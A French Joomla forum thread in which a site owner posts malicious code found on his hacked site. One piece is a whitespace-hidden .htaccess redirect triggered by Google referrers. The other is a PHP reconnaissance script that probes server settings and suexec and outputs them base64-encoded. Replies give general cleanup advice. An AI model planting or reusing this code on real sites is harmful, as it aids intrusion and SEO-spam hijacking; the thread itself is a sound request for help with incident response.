hack par fichier a la racine

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [RÉGLÉ] hack par fichier a la racine

    Bonjour, a l'aide d'un outil google, je me suis rendu compte qu'un des sites que j'avais realisé etait infecté
    En cherchant, j'ai vu que le .htaccess contenait ceci (visible avec wordpad et pas le bloc note)
    Code:
                                                                                                                            <IfModule mod_rewrite.c>                                                                                                                        
                                                                                                                            RewriteEngine On                                                                                                                        
                                                                                                                            RewriteCond %{HTTP_REFERER} ^.*(google)\.(.*)                                                                                                                        
                                                                                                                            RewriteRule ^(.*)$                                                                                                          
                                                                                                                            </IfModule>
    ensuite un fichier est placé a la racine

    Code:
    <?php error_reporting(0);function _getBytes($val){$val = trim($val);$last = strtolower($val[strlen($val)-1]);switch($last){case "g":$val *= 1024;case "m":$val *= 1024;case "k":$val *= 1024;}return $val;}$d = dirname($_SERVER["SCRIPT_FILENAME"]);$ini_memory_limit = _getBytes(ini_get("memory_limit"));$phpversion_gd = false;if (function_exists("gd_info")){$r = gd_info();if (preg_match("/[\d\.]+/", $r["GD Version"], $m)){$phpversion_gd = $m[0];}}$phpversion_curl = false;if (function_exists("curl_version")){$phpversion_curl = curl_version();$phpversion_curl = $phpversion_curl["version"];}$phpversion_sqlite = phpversion("sqlite3");if ( $phpversion_sqlite === false ){$phpversion_sqlite = phpversion("sqlite");}$o = array("ds"                    => DIRECTORY_SEPARATOR,"fd"                    => true,"path"                    => $d,"has_php"                => phpversion(),"has_php_zlib"            => phpversion("zlib"),"has_php_mysql"            => phpversion("mysql"),"has_php_mysqli"        => phpversion("mysqli") !== false ? "1" : false,"has_php_pdo_mysql"        => phpversion("pdo_mysql"),"has_php_gd"            => $phpversion_gd,"has_php_curl"            => $phpversion_curl,"has_php_zip"            => phpversion("zip"),"has_php_simplexml"        => phpversion("simplexml") !== false ? "1" : false,"has_php_sqlite"        => $phpversion_sqlite, "has_php_zend"            => extension_loaded("Zend Guard Loader") || extension_loaded("Zend Optimizer") ? "1" : false,"has_php_memory_limit"    => $ini_memory_limit === 0 ? false : ceil($ini_memory_limit/1048576),"has_mysql"                => function_exists("mysql_get_client_info") ? true :( function_exists("mysqli_get_client_info") ? true :( phpversion("mysqlnd") !== false ? true : false )),"has_php_safe_mode"        => ini_get("safe_mode") && ini_get("safe_mode") !== "off" ? true : false,"has_php_open_basedir"    => ini_get("open_basedir") ? true : false,"has_php_register_globals"    => ini_get("register_globals") && ini_get("register_globals") !== "off" ? true : false,"has_php_short_open_tag"    => ini_get("short_open_tag") && ini_get("short_open_tag") !== "off" ? true : false,"has_php_url_fopen"        => ini_get("allow_url_fopen") && ini_get("allow_url_fopen") !== "off" ? true : false,"has_php_cgi"            => false,"has_asp"                => false);if (isset($_SERVER["DATABASE_SERVER"])){$o["has_mysql_host"] = $_SERVER["DATABASE_SERVER"];}if ( DIRECTORY_SEPARATOR === "\\" ){$o["has_php_suexec"] = true;}else{if ( false !==( $fp = fopen($d.'/deleteme.fdlqlggs.php.txt',"a") )){@flock($fp,LOCK_EX);$i = 0;while ( $i < 10 *2 ){if (!@fwrite($fp,str_repeat(" ",524288))){$o["fs"] = false;break;}++$i;}@flock($fp,LOCK_UN);@fclose($fp);}if (file_exists($d.'/deleteme.fdlqlggs.php.txt')){$o["has_php_suexec"] = fileowner($d.'/deleteme.fdlqlggs.php.txt') === fileowner($d.'/deleteme.fdlqlggs.php');unlink($d.'/deleteme.fdlqlggs.php.txt');}else{$o["has_php_suexec"] = false;}}echo "__deleteme.fdlqlggs.php__",base64_encode(serialize($o)),"__";?>
    J'ai tout corrigé, modifié les mdp et compte sur le serveur mais si quelqu'un comprends le pourquoi du comment et si c'est grave car il a reussi a remonter avant le dossier public_html

    Merci
    Dernière édition par groomy à 08/01/2013, 18h23

  • #2
    Re : hack par fichier a la racine

    [MODO]Sujet déplacé dans la bonne section du forum et édité[/MODO]

    Pour le reste, lis la section du forum sur la sécurité.

    Commentaire


    • #3
      Re : hack par fichier a la racine

      Constructive la reponse !! Au bout de la 8eme page (enfin en reste que 2) Ca ne m'aide pas a savoir avec ce script si autre chose est infecté et comment il est passé ?
      Merci quand même !

      Commentaire


      • #4
        Re : hack par fichier a la racine

        Salut
        C'est quasi impossible de t'aider là dessus. Les hack peuvent être tellement différent.
        Bon reflexe d'avoir changé les mdp partout
        Ton site était il à jour ? extensions et joomla ? si le hack s'est fait par une extension et que tu n'as pas corrigé la faille, le changement de mdp ne va pas servir à grand chose
        Ensuite le problème peut aussi venir de ton pc s'il a un virus.
        Par contre si tu utilises filezilla il ne faut pas enregistrer les mdp
        Auto-entrepreneur spécialiste Joomla https://www.stylitek.com

        Joomladay 2023 https://www.joomladay.fr/ 2 jours à ne pas manquer

        Commentaire


        • #5
          Re : hack par fichier a la racine

          Avec "base64" tu vas en trouver des sujets, il faut bien te dire que seul toi à une vue sur tes logs, tes fichiers etc.

          A partir du moment ou il y a modif de fichiers, ton site doit être passé au peigne fin, mettre à jour, analyser ta machine etc etc. Bref tout ce qui est dit et répété très souvent sur les forums sécurités.

          Commentaire


          • #6
            Re : hack par fichier a la racine

            Merci pour vos reponses, effectivement 1 extension pas a jour que le client avait bricolé..
            Ce que je voulais dire est que le code fait bien quelque chose, c'est surtout ca que je voulais comprendre.
            Merci

            Commentaire


            • #7
              Re : hack par fichier a la racine

              Ce que je voulais dire est que le code fait bien quelque chose
              Là je ne comprend pas. Bien entendu c'est un code mal fichu qui provoque une faille de sécurité.
              Mais comment t'aider plus. Comme te dis zepelin57 il faut avoir les infos sous les yeux pour faire quelque chose.
              Auto-entrepreneur spécialiste Joomla https://www.stylitek.com

              Joomladay 2023 https://www.joomladay.fr/ 2 jours à ne pas manquer

              Commentaire


              • #8
                Re : hack par fichier a la racine

                Lol , language de sourd ..
                Le code ci-joint, je n'arrive pas a tout déchiffrer. Mais pas grave, le site est propre à nouveau.
                Merci pour votre aide. Du moment que plus rien ne se pass, mais bon du coup google a shooter le site..Vais redemander un examen.
                Si personne ne s'affole avec le code, c'est qu'il y a rien de catastrophique.
                Bonne soirée

                Commentaire

                Annonce

                Réduire
                Aucune annonce pour le moment.

                Partenaire de l'association

                Réduire

                Hébergeur Web PlanetHoster
                Travaille ...
                X